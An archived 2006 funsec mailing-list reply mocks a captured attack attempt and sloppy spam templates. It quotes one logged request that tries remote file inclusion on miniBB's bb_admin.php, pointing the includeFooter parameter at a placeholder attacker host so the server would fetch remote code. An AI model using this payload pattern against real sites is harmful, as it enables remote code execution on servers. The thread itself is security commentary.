funsec mailing list archives
Re: interesting attack
From: Peter Kosinar <goober () nuf ksp sk>
Date: Wed, 19 Apr 2006 21:11:29 +0200 (CEST)
GET /minibb/bb_admin.php?includeFooter=http://[attacker] HTTP/1.1
Actually, it was pretty obvious what vulnerability was (s)he TRYING to exploit (the "sec" part of the name of the list); I was, on the other hand, trying to point out the "[attacker]" part of the message, which apparently is a result of his/her skript-kiddieness (the "fun" part :-) ).
I saw a spam recently with a 'From: youruserid () yourspamsite com'.
An equally interesting pieces of art from the spamology department are: Subject: Fast Zyban %RANDOM_WORD <strong>Low</%RANDOM_WORD>est Rates GUARA</%RANDOM_WORD>NTEED!<br> Peter -- [Name] Peter Kosinar [Quote] 2B | ~2B = exp(i*PI) [ICQ] 134813278 _______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
Current thread:
- interesting attack Henderson, Dennis K. (Apr 14)
- Re: interesting attack Anthony Rodgers (Apr 16)
- Re: interesting attack Peter Kosinar (Apr 19)
- Re: interesting attack Technocrat (Apr 19)
- Re: interesting attack Valdis . Kletnieks (Apr 19)
- Re: interesting attack Brian Loe (Apr 19)
- Re: interesting attack Valdis . Kletnieks (Apr 19)
- Re: interesting attack Brian Loe (Apr 19)
- Re: interesting attack Technocrat (Apr 19)
- Re: interesting attack Peter Kosinar (Apr 19)
- Re: interesting attack Technocrat (Apr 19)